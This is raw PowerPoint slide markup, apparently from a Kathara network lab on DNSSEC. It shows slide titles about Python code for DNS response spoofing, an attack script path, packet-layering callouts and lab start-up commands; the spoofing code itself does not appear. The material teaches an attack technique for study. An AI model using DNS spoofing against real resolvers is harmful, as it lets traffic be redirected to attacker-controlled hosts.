                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59EBF56D-468F-C76A-2FB9-37099A043A9E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="176" y="3327"/>
              <a:ext cx="1939" cy="50"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>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r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/r2/r2_attack.py</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46B3C02E-F689-D5BA-FB49-1693CF39FAF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1533524" y="116632"/>
            <a:ext cx="10048875" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python code for DNS response spoofing and forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7197293-87CE-A4AA-4DA9-16E7D775DF2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C035C35-508E-5AB9-E016-7C3490171DA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{257E29F4-F512-D727-4D08-55979A3DBE92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8590809" y="5112126"/>
            <a:ext cx="3271550" cy="652645"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -157659"/>
              <a:gd name="adj2" fmla="val -76171"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>send the packet over the network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0D158B7-166A-EC6C-8082-169D143B507F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="66594" y="1909973"/>
            <a:ext cx="2925988" cy="892604"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 38065"/>
              <a:gd name="adj2" fmla="val 157046"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effec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dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Put DNS inside UDP, UDP inside IP, and IP inside Ethernet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23104894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9EDA33-4200-E85F-3A91-418891ACEFC1}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F952F1-9D28-98A9-D1CC-F858E1CF1AA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>tart the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18437" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F0047C1-EDCB-1F0F-0171-AE4ACF9C2EB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>start the lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
              <a:t>open any browser on the host machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" noProof="0" dirty="0"/>
              <a:t>localhost:3001 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CF29E19-DCDA-4C58-6C04-7A1FE5DCA63F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7C45274-624E-EA5D-81A3-71C72377CB2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F490BA6-A322-DA8D-5E95-861EE7935C44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="2191793"/>
            <a:ext cx="10972800" cy="1237207"/>
            <a:chOff x="607480" y="2378845"/>
            <a:chExt cx="10972800" cy="1237207"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86E9B6CA-DB16-E52B-EB47-CACD1CD9F222}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2668294"/>
              <a:ext cx="10972799" cy="947758"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>user@localhost</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:~$ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cd </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara-dnssec</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>user@localhost</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:~/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara-dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lstart</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6581AC74-0A3E-437A-FB6D-384DC87F3A8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2378845"/>
              <a:ext cx="10972800" cy="289449"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28699721-3D0E-677E-B153-629DC62619B5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0141D89-6E4F-71DF-9F37-5185247FC2AF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C61C7E-7EF5-1531-F243-AA376D5E2BDE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{851B0B1F-5220-B5F9-3698-32984B2813A1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20084078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60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
